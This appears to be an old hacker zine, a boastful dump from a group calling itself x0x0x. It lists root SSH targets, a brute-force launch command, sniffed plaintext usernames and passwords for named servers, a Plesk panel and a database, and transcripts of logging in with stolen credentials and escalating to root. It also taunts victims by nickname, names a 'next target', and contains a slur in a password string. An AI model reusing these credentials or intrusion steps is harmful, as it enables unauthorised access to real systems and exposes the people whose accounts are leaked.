ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh 213.239.174.129 -l root
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]
ssh [email protected]

bash# nohup ./brute list >> /dev/null &

l0000000000lll




((((((((((((((( OKAY I WILL PASTE NOW SOME SNIFF LOGS ))))))))))))))))))))))


#COOL CORPORATION OF EFNET GOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOD

66.109.20.52/corp.efnet.net (stevoo:1qaz,2wsx) (venial:n1gg0rv3n) - FreeBSD corp.efnet.net 6.3-STABLE FreeBSD 6.3-STABLE #0: Fri Feb  8 21:24:16 UTC 2008     [email protected]:/usr/obj/usr/src/sys/corp  i386 | cat /home/venial/psybnc/lang/french.lng

72.20.13.30/box.observers.net (venial:n1gg0rv3n) (coldfyre:qksq90a) - FreeBSD box.observers.net 6.1-RELEASE-p10 FreeBSD 6.1-RELEASE-p10 #7: Mon Oct 23 15:14:33 PDT 2006     [email protected]:/usr/obj/usr/src/sys/obs  i386

85.24.148.29/evilbsd.com (venial:n1gg0rv3n) - FreeBSD epic.xzibition.com 5.4-RELEASE-p16 FreeBSD 5.4-RELEASE-p16 #1: Sat Jun 17 00:03:34 CEST 2006     [email protected]:/usr/obj/usr/src/sys/EPIC i386 i386 Intel(R) Pentium(R) 4 CPU 3.00GHz FreeBSD

72.20.48.65/echo.xzibition.com (venial:n1gg0rv3n) - FreeBSD echo.xzibition.com 6.1-RELEASE-p10 FreeBSD 6.1-RELEASE-p10 #1: Fri Nov  3 23:59:29 UTC 2006     [email protected]:/usr/obj/usr/src/sys/ECHO  i386

212.71.19.102/users.geekshells.org (venial:n1gg0rv3n) - FreeBSD spark.ofloo.net 6.3-RELEASE-p1 FreeBSD 6.3-RELEASE-p1 #11: Sun Feb 17 13:18:10 CET 2008     [email protected]:/usr/obj/usr/src/sys/OFL  i386

& THKX VENIAL*********************









[root@x0x0x ~]# ssh accord.lyms.org -l smyl
[email protected]'s password: ^(x187

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash$ sudo su root
Password: xxxxxx

bash# uname -a
FreeBSD accord.lyms.org 6.2-RELEASE-p5 FreeBSD 6.2-RELEASE-p5 #0: Fri Jun 15 11:27:14 PDT 2007     [email protected]:/usr/obj/usr/src/sys/FOO  i386
bash# exit






@#@#@###@#@ smyl you are really expert... making password of nsdfix.accesshost.us same as accord.lyms.org!! thks very much!!@#@@#@#@##@#@#



[root@x0x0x ~]# ssh nsdfix.accesshost.us -l smyl
[email protected]'s password: ^(x187

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash$ sudo su root
Password: xxxxxx

bash# uname -a
Linux nsdfix.accesshost.us 2.6.18-6-486 #1 Sun Feb 10 22:06:33 UTC 2008 i686 GNU/Linux
bash# exit






#@#@#@##@ OKAY... dont try change ur password!! i will hack again...



[root@x0x0x ~]# ssh 64.18.144.130 -l smyl
[email protected] 's password: ^(x187

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash$ sudo su root
Password: xxxxxx


// (dak- owned ?)


bash# cat /etc/passwd|grep dak|wc -l
1
bash# uname -a
FreeBSD rock.accessshells.us 6.1-RELEASE FreeBSD 6.1-RELEASE #0: Thu Oct 18 20:45:44 EDT 2007     [email protected]:/usr/obj/usr/src/sys/LSD  i386
bash# exit





;;;;;;;...........

   ___      ___             
  /   \____/   \   NO WOMAN 
 /    / __ \    \   NO BALLS
/    |  ..  |    \          
\___/|      |\___/\         
   | |_|  |_|      \        
   | |/|__|\|       \       
   |   |__|         |\      
   |   |__|   |_/  /  \     
   | @ |  | @ || @ |   '    
   |   |~~|   ||   | HF     
   'ooo'  'ooo''ooo'        



cat somesniff_log;

<Smoracle> the domain for dev: dredgemedia.org, un: dredgemediaorg pass: g3u5nonwrp
<Smoracle> plesk login: https://dredgemedia.org:8443
<Smoracle> db name: pu   username: dredge_pu_dev   pass: ip35jrt24



.......................(dont worry, be happy!) l0l







staring on x0x0x2;


          -----------
         ´           `
        ´         - monstershells
       ´         ´
      ´      phisher1
     ´          o 
    ´           |
   |           / \                    hub.us.quakenet.org         __ *webguidepartner.com
   |- efnet - /   \               ---´                     sonny ´                 
   ´         /     \             ´                    ----´
dukat+-------       -------+stevoo    efnet.port80.se´
         \   \union/   /         `---´
         /   /     \   \                                                 
venial+-----        -----+smyl/dak   some shells
   `-                            `---´
     `some shells



                              /       /
                           .'<_.-._.'<
                          /           \      .^.
        ._               |  -+- -+-    |    (_|_)
     r- |\                \   /       /      // 
   /\ \\  :                \  -=-    /       \\
    `. \\.'           ___.__`..;._.-'---...  //
      ``\\      __.--"        `;'     __   `-.  
        /\\.--""      __.,              ""-.  ".
        ;=r    __.---"   | `__    __'   / .'  .'
        '=/\\""           \             .'  .'
            \\             |  __ __    /   |
             \\            |  -- --   //`'`'
              \\           |  -- --  ' | //
               \\          |    .      |// r.s.t.

~> messages

    (*) stevoo            - Open your eyes is a good way to avoid punches! (see stevoo picture, to understand this, LOL)
    (*) phisher1          - You are easy! think this. learn more www.linux.org/lessons/.
    (*) smyl              - Teach about security lol http://apex.vtc.com/linux-security.php.
    (*) venial            - We like you, but don´t be kiddie.
    (*) dubkat            - You are 100% pwned, keed quiet.
    (*) ik                - Do not be shown. We wont make fun about you.
    (*) misery            - As you asked, your nick dont be here! Do not make to be :) !
    (*) dtr               - NEXT TARGET!
    (*) dmer [at] brlink  - Open your eyes.
    (*) ?                 - Don´t keep in us way.


*'no much patience to do this zine'*



^^^^^^^ ^^^^^^^ ^^^^^^^ ^^^^^^^   ^^^^^^^
^^^^^^^ thkx to #soldiers @ efnet ^^^^^^^ 
^^^^^^^        g.  and      	  ^^^^^^^ 
^^^^^^^       all blackhats!  	  ^^^^^^^ 
^^^^^^^ ^^^^^^^ ^^^^^^^ ^^^^^^^   ^^^^^^^


# x0x0x r. - s. - t.
#
# wanna send us a message? x0x0xcr3w [at] gmail [dot] com
#
# EOF
 
Источник
www.exploit-db.com